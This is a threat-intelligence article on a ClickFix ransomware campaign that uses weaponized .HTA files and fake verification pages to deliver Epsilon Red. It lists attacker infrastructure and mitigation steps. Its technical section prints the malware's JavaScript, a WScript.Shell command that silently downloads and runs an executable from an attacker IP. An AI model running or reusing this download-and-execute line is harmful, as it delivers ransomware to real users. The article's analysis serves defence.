In July 2025, a sophisticated ransomware campaign emerged, utilizing weaponized HTML Application (.HTA) files to distribute the Epsilon Red ransomware strain. This global operation employs deceptive ClickFix verification pages to target users of popular platforms such as Discord, Twitch, Kick, and OnlyFans.
Deceptive Tactics and Execution
The attackers craft counterfeit verification portals that prompt users to confirm their authenticity before accessing content. Upon interaction, these portals redirect users to secondary pages embedded with ActiveX controls—a legacy Windows technology still active in many systems. This method enables the execution of arbitrary commands within Internet Explorer’s rendering engine, effectively bypassing standard download warnings and security measures.
CloudSEK researchers have observed that this redirection strategy marks a significant evolution from previous Epsilon Red campaigns, which relied on clipboard-based lures. The current approach has notably increased the success rate of infections.
Technical Breakdown of the Attack
The attack initiates with an .HTA file processed by mshta.exe, containing JavaScript code that creates a WScript.Shell object. This object executes a command to navigate to the user’s profile directory, download a malicious executable named `vir.exe` from an attacker-controlled server, and run it discreetly. The command used is:
“`javascript
var shell = new ActiveXObject(WScript.Shell);
shell.Run(cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155.227:2269/dw/vir.exe && a.exe, 0);
“`
To divert the user’s attention, the script displays a fake verification code prompt:
“`javascript
shell.Run(cmd /c echo Your Verification Code Is: P3L9X & pause);
“`
Once executed, the ransomware operates with full user-level privileges, establishes persistence through scheduled tasks (`schtasks`), and initiates network discovery to identify additional targets.
Infrastructure and Attribution
Analysis by CloudSEK has linked the campaign’s infrastructure to domains such as twtich[.]cc and capchabot[.]cc, and IP addresses 155.94.155.227:2269 and 213.209.150.188:8112. These findings suggest a coordinated effort by a specific group of threat actors.
Implications and Security Concerns
Victims experience rapid data encryption characteristic of Epsilon Red ransomware, accompanied by ransom notes reminiscent of those used by the REvil group, albeit with minor grammatical differences.
This attack vector highlights a significant security vulnerability: the exploitation of legacy ActiveX environments to execute native binaries directly from browser sessions. This technique effectively circumvents download quarantines, SmartScreen filters, and many endpoint defenses. Organizations that utilize web-based productivity tools or permit unmanaged browser plugins are particularly susceptible to such attacks.
Mitigation Strategies
To defend against this threat, organizations should consider the following measures:
– Disable ActiveX and Windows Script Host (WSH): Implement Group Policies to block legacy script execution vectors, including WScript.Shell and ActiveXObject, across all environments.
– Integrate Threat Intelligence Feeds and IP Blocking: Proactively incorporate threat intelligence to blacklist known malicious IPs and domains associated with ClickFix campaigns.
– Deploy Endpoint Behavior Analytics: Utilize Endpoint Detection and Response (EDR) solutions to detect and alert on hidden executions, such as those initiated by shell.Run, cmd /c, and silent downloads via curl.
– Conduct Security Awareness Training: Simulate attacks that mimic familiar services (e.g., Discord bots, Twitch) to educate users on recognizing and avoiding fake verification pages.
By implementing these strategies, organizations can enhance their resilience against sophisticated ransomware campaigns that exploit legacy technologies and social engineering tactics.
